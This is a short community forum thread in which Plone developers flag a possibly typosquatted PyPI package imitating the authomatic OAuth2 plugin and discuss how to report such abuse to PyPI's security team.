Pas.plugins. C authomatic

Browsing PyPi today.

ALL: This is the official maintained authomatic oAuth2 plugin:

But.... this came up in a search....

https slash project slash pas.plugins.cauthomatic

Now, I'd hate to think there's a typosquatter out there trying to harvest credentials.... Probably an honest mistake, but could someone take a quick look at what this is?

Honestly, I would absolutely love to distract myself and spelunk both these plugins and discover a bad actor (or just boring mistakes) but I REALLY need to focus on my job. I'm sorry I'm bringing you guys work instead of solutions.

@jensens @ericof @thet @saily

I notified the security team some time ago about a similar issue with project/ collective.saml2/ - it links to someone's project on Github, not to GitHub - collective/collective.saml2: Installation of SAML2 web single-sign-on for Plone (dm.zope.saml2)

Is there any process how to report abuse on PyPI? I am a bit lost on Help · PyPI and can not find an explicit process to follow.

@jensens Security · PyPI (Found link in the footer)

1 Like

Anyone spelunked or diffed it with 1.1.2 of the approved plugin?

Does it even matter?